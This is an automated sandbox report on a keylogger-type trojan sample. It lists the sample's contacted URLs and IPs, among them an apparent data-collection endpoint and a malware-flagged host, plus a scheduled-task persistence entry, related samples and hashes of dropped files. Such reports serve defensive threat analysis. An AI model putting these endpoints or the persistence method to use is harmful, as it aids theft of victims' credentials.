https://www.office.com/p	Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002F00000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://anotherarmy.dns.army:8081	Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enlB	Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000033A9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org	Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E23000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003284000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1280413561.00000000024A9000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 0000000C.00000002.1319580024.000000000328E000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003284000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1501092
Start date and time:	2024-08-29 12:15:22 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Autofill Manufacturing Sdn Bhd 28-08-2024.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/15@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 192 Number of non-executed functions: 25
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:16:11	API Interceptor	8529627x Sleep call for process: Autofill Manufacturing Sdn Bhd 28-08-2024.exe modified
06:16:13	API Interceptor	27x Sleep call for process: powershell.exe modified
06:16:16	API Interceptor	5980865x Sleep call for process: GhrKoSGuCdvpJ.exe modified
12:16:13	Task Scheduler	Run new task: GhrKoSGuCdvpJ path: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	8468281651.exe	Get hash	malicious	Snake Keylogger	Browse
	SecuriteInfo.com.Trojan.Inject5.5513.6456.21079.exe	Get hash	malicious	AgentTesla	Browse
	172491222445a0c92f9706bf9b262539610e069f8890c9344283eed4f05fff1647f3cf570f744.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	QUOTATION_AUGQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	RFQ-MR-24-09101 SPS.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.W32.MSIL_Kryptik.KTU.gen.Eldorado.3036.13101.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.W64.ABRisk.KSAB-7665.26815.23633.exe	Get hash	malicious	Blank Grabber	Browse
	1C24TDH_00017388.pdf.exe	Get hash	malicious	AgentTesla	Browse
	df24c9ca-d50b-c720-84ed-638e99f68d75.eml	Get hash	malicious	Snake Keylogger	Browse
	18__ e_t___s#U00b5__ 2,6_ G___F____ _._.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
188.114.97.3	Document_pdf.exe	Get hash	malicious	FormBook	Browse	www.x0x9x8x8x7x6.shop/dscg/
	QUOTATION_AUGQTRA071244#U00b7PDF.scr	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/zbi9vNYx/download
	z1209627360293827.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.coinwab.com/kqqj/
	file.exe	Get hash	malicious	LummaC	Browse	joxi.net/4Ak49WQH0GE3Nr.mp3
	Rudvfa0Z17.exe	Get hash	malicious	Nitol	Browse	web.ad87h92j.com/4/t.bmp
	nOyswc9ly2.dll	Get hash	malicious	Unknown	Browse	web.ad87h92j.com/4/t.bmp
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/0U9QqTZ6/download
	QUOTATION_AUGQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	filetransfer.io/data-package/e0pM9Trc/download
	steam_module_x64.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	671893cm.n9shka.top/eternalpipeLowProcessDbDatalifewpPublicCdn.php
	http://membership.garenaa.id.vn/css/tunnel.aspx/manager10.jsp	Get hash	malicious	Unknown	Browse	membership.garenaa.id.vn/user/login/images/fb_ico.png
193.122.6.168	Offer 2024-30496.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	pagamento.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	QUOTATION_AUGQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	RFQ-MR-24-09101 SPS.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Bukti-Transfer.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Statement of Account.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	FedEx Shipping Confirmation.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	2024-08-23 Fra. 24-1632 000815 (FACT de B12813622).exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	FACTURA PENDIENTE DE COBRO P24PM0531563.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Order Al Fari Asia Project - ORMANALGERIE Quote #2374832-doc.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	Offer 2024-30496.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	pagamento.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	8468281651.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	STATEMENT Aug 2024.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	172491222445a0c92f9706bf9b262539610e069f8890c9344283eed4f05fff1647f3cf570f744.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	QUOTATION_AUGQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	RFQ-MR-24-09101 SPS.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SecuriteInfo.com.W32.MSIL_Kryptik.KTU.gen.Eldorado.3036.13101.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Spec sheet.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	df24c9ca-d50b-c720-84ed-638e99f68d75.eml	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
checkip.dyndns.com	Offer 2024-30496.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	pagamento.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	8468281651.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	STATEMENT Aug 2024.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	172491222445a0c92f9706bf9b262539610e069f8890c9344283eed4f05fff1647f3cf570f744.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	QUOTATION_AUGQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	RFQ-MR-24-09101 SPS.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	SecuriteInfo.com.W32.MSIL_Kryptik.KTU.gen.Eldorado.3036.13101.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Spec sheet.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	df24c9ca-d50b-c720-84ed-638e99f68d75.eml	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
api.telegram.org	8468281651.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.Inject5.5513.6456.21079.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	172491222445a0c92f9706bf9b262539610e069f8890c9344283eed4f05fff1647f3cf570f744.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	QUOTATION_AUGQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RFQ-MR-24-09101 SPS.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.W32.MSIL_Kryptik.KTU.gen.Eldorado.3036.13101.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.W64.ABRisk.KSAB-7665.26815.23633.exe	Get hash	malicious	Blank Grabber	Browse	149.154.167.220
	1C24TDH_00017388.pdf.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	df24c9ca-d50b-c720-84ed-638e99f68d75.eml	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	18__ e_t___s#U00b5__ 2,6_ G___F____ _._.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	Offer 2024-30496.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	pagamento.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	172491222445a0c92f9706bf9b262539610e069f8890c9344283eed4f05fff1647f3cf570f744.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	QUOTATION_AUGQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	RFQ-MR-24-09101 SPS.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	SecuriteInfo.com.W32.MSIL_Kryptik.KTU.gen.Eldorado.3036.13101.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Spec sheet.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	https://ca.docusign.net/Signing/EmailStart.aspx?a=f73cd823-d46e-4c1d-9aa7-a3313bd2d402&etti=24&acct=9d2cdf2a-d1fa-4c66-83f5-9dd312af890e&er=68a0e22a-40d9-446a-8837-385c38bcc4d8	Get hash	malicious	Unknown	Browse	192.29.14.118
	18__ e_t___s#U00b5__ 2,6_ G___F____ _._.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	DETAILING_INFO_0321.vbe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
TELEGRAMRU	8468281651.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.Inject5.5513.6456.21079.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	172491222445a0c92f9706bf9b262539610e069f8890c9344283eed4f05fff1647f3cf570f744.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	QUOTATION_AUGQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RFQ-MR-24-09101 SPS.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.W32.MSIL_Kryptik.KTU.gen.Eldorado.3036.13101.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
CLOUDFLARENETUS	Curriculum Vitae.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	Fordybendes.exe	Get hash	malicious	Azorult, GuLoader	Browse	188.114.96.3
	G_24370-24396_SI2_S25_8658_MPO_SMARTEX_240715.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	172.67.74.152
	Offer 2024-30496.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	pagamento.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Po#70831.exe	Get hash	malicious	Azorult	Browse	172.67.128.117
	payment PAGO 2974749647839452.js	Get hash	malicious	Unknown	Browse	162.159.130.233
	Document_pdf.exe	Get hash	malicious	FormBook	Browse	104.21.62.58
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Offer 2024-30496.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	pagamento.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	8468281651.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	STATEMENT Aug 2024.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	172491222445a0c92f9706bf9b262539610e069f8890c9344283eed4f05fff1647f3cf570f744.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	QUOTATION_AUGQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	RFQ-MR-24-09101 SPS.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SecuriteInfo.com.W32.MSIL_Kryptik.KTU.gen.Eldorado.3036.13101.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Spec sheet.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	cY-5134-kfF.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	G_24370-24396_SI2_S25_8658_MPO_SMARTEX_240715.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	149.154.167.220
	payment PAGO 2974749647839452.js	Get hash	malicious	Unknown	Browse	149.154.167.220
	Great Wall Motor Sale Bank_Sift_Copy.Pdf.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	149.154.167.220
	https://paquete.centrodelvaquero.com/	Get hash	malicious	Unknown	Browse	149.154.167.220
	QUOTATION_AUGQTRA071244#U00b7PDF.scr	Get hash	malicious	Unknown	Browse	149.154.167.220
	QUOTATION_AUGQTRA071244#U00b7PDF.scr	Get hash	malicious	Unknown	Browse	149.154.167.220
	8468281651.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	input.htm	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GhrKoSGuCdvpJ.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4xympjgs4RIoU99tK8NPZHUl7u1iMugeC/ZM0Uyus:lGLHxvCsIfA2KRHmOugw1s
MD5:	2841736A1E367C6D039C41512DA2893E
SHA1:	8AE1356D954F14390DD115EB92E2B01F86E98141
SHA-256:	70D4743FAB5C407020B872595615D3B018AC17A6F504084BF1E95B061C97047E
SHA-512:	E11A1F186A9B75658F905B7128526E054CEE572A4F55BBB864B5E8B5DC3D8B62D1E160F31472213DB0CEB8A612D71B23DAE03EBC6AB5BC0D8933732F2007EF6C
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0gaiz3yh.3nb.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ed1eyoy.dbh.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3hy4umc5.uqy.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dtxhfwmy.4jf.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

